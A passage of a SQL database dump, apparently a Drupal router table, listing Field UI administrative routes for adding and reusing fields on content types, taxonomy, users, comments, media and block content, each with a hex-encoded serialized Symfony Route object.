7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37363a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f6669656c64732f6164642d6669656c64223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_add_taxonomy_term', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/fields/add-field', '/admin/structure/taxonomy/manage/%/overview/fields/add-field', 247, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f72616765416464466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33313a2261646d696e6973746572207461786f6e6f6d795f7465726d206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39383a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f6f766572766965772f6669656c64732f6164642d6669656c64223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234373b733a31343a227061747465726e4f75746c696e65223b733a36303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('field_ui.field_storage_config_add_user', '/admin/config/people/accounts/fields/add-field', '/admin/config/people/accounts/fields/add-field', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f72616765416464466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722075736572206669656c6473223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35343a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f6164642d6669656c64223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('field_ui.field_storage_config_reuse_block_content', '/admin/structure/block-content/manage/{block_content_type}/fields/reuse', '/admin/structure/block-content/manage/%/fields/reuse', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34333a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f726167655265757365466f726d223b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a33313a2261646d696e697374657220626c6f636b5f636f6e74656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6669656c64732f7265757365223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_reuse_block_content.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields/reuse', '/admin/structure/block/block-content/manage/%/fields/reuse', 251, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37373a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a33313a2261646d696e697374657220626c6f636b5f636f6e74656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39353a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6669656c64732f7265757365223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235313b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('field_ui.field_storage_config_reuse_comment', '/admin/structure/comment/manage/{comment_type}/fields/reuse', '/admin/structure/comment/manage/%/fields/reuse', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34333a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f726167655265757365466f726d223b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a32353a2261646d696e697374657220636f6d6d656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37363a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6669656c64732f7265757365223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_reuse_contact_message', '/admin/structure/contact/manage/{contact_form}/fields/reuse', '/admin/structure/contact/manage/%/fields/reuse', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34333a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f726167655265757365466f726d223b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a33333a2261646d696e697374657220636f6e746163745f6d657373616765206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37363a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6669656c64732f7265757365223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_reuse_media', '/admin/structure/media/manage/{media_type}/fields/reuse', '/admin/structure/media/manage/%/fields/reuse', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35353a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34333a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f726167655265757365466f726d223b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a32333a2261646d696e6973746572206d65646961206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37323a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6669656c64732f7265757365223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_reuse_node', '/admin/structure/types/manage/{node_type}/fields/reuse', '/admin/structure/types/manage/%/fields/reuse', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35343a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34333a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f726167655265757365466f726d223b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a32323a2261646d696e6973746572206e6f6465206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f6669656c64732f7265757365223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226e6f64655f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_reuse_taxonomy_term', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/fields/reuse', '/admin/structure/taxonomy/manage/%/overview/fields/reuse', 247, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37363a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34333a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f726167655265757365466f726d223b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a33313a2261646d696e6973746572207461786f6e6f6d795f7465726d206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d733a343a2275746638223b623a313b7d733a373a22736368656d657